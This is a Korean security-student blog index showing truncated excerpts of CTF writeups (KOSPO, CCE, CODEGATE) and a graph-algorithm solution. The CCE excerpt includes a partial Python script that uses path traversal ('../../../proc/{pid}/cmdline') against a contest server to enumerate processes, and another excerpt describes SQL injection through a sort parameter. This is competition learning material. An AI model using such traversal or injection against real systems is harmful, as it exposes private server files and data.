| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 |
- ctf
- webhacking.kr
- Writeup
- Linux
- 시스템
- rubiya
- 운영체제
- hacking
- 화이트햇콘테스트
- crosssitescripting
- 상호배제
- Python
- CODEGATE
- WebHacking
- SQLInjection
- 프로세스
- 웹해킹
- Los
- webhackingkr
- XSS
- SQL
- 알고리즘
- lordofsqlinjection
- 시스템프로그래밍
- ubuntu
- SQL Injection
- web
- CCE
- 해킹
- sqli
- Today
- Total
목록전체 글 (67)
One_Blog
문제 .. 를 보고 직접 분석도 하고, 스샷도 찍고 할려고 했는데 .. 문제 인스턴스가 대회 끝나고 다 내려가 버렸다. 어쩔 수 없이 기억에 의존할 수 밖에 없다 ㅠㅠ 우선 KOSPO 대회의 경우, 이번엔 오전 10시부터 오후 18시까지 대회가 진행 되었다. 시간도 CCE마냥 엄청 조금 주는데, 심지어 라이트업까지 쓰게 시켰다.. 처음엔 엄청 시간이 촉박하다 라고 생각했는데, 풀면서 문제 난이도를 보니, 이렇게 시킬만 하다고 생각되었다. Rev, Pwn 등의 난이도는 안풀어봐서 잘 모르겠지만, Web은 일단 무난하게 쉬운 편이었다. 그럼에도 웹 하나를 못풀었는데 ... 그 이유는 나중에 설명하겠다. KOSPO의 경우, Web, Pwn, Rev, For와 같이 굉장히 다양한 분야의 문제가 출제되었는데, 특..
CCE.. 예선이 5월인가 그랬는데 중간에 행사가 너무 많아서 이제야 올리게됐다. 사이트도 다 닫히고 이미 할 게 없는 수준이지만 그냥 심심해서 올려본다. import sys,threading, requests URL = f'http://20.196.197.149:8000/' cpus = 0 pid_max = 4194304 nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'page': f'../../../../../../proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx worker found: {pid}') nginx_..
웹 해킹을 시작한 지 6개월 째... 지난번엔 CCE 본선을 가는데 성공했고 이번엔 코드게이트에서 문제를 푸는데 성공했다. 주니어부 26위를 했는데, 전날 밤 안자고 풀었으면 본선 갔을 수 있는데 너무 안타깝다. 968점짜리 웹 문제 취약점 찾고 끝났는데, 일단 내가 풀었던 myboard 라이트업을 작성하겠다. 원래 사이트에 접속해서 직접 페이로드를 동작시키는 걸 보여주고 싶었는데, 시험 공부 + 프로젝트 때문에 라이트업 작성을 미루다가 CTF 사이트가 닫혔다. 그래서 그냥 ... 풀이만 올리도록 하겠다. myboard의 경우 글 조회만 가능한 간단한 게시판이 구현되어 있었고, 게시글 총 조회 화면에서 sort_by를 통해 sqli가 가능한 취약점이 있었다. 사실 말만 들어보면 엄청 간단한데, 첫 솔버가..
백준 골드 4 이분 그래프 문제이다. 다음과 같은 그래프가 주어지면 해당 그래프가 이분 그래프인지 아닌 지 판별하는 문제이다. 이분 그래프란, 그래프의 정점 집합을 둘로 분할하여, 각 집합에 속한 정점끼리 서로 인접하지 않도록 분할할 수 있는 그래프를 의미한다. 이런식..?인데, 파랑끼리 연결 안되고, 빨강끼리 연결 안된 거를 보면 된다. from collections import deque def is_bipartite(a, edges): color = [0] * (a + 1) visited = [False] * (a + 1) for v in range(1, a + 1): if visited[v]: continue stack = deque([(v, 1)]) while stack: vertex, c = ..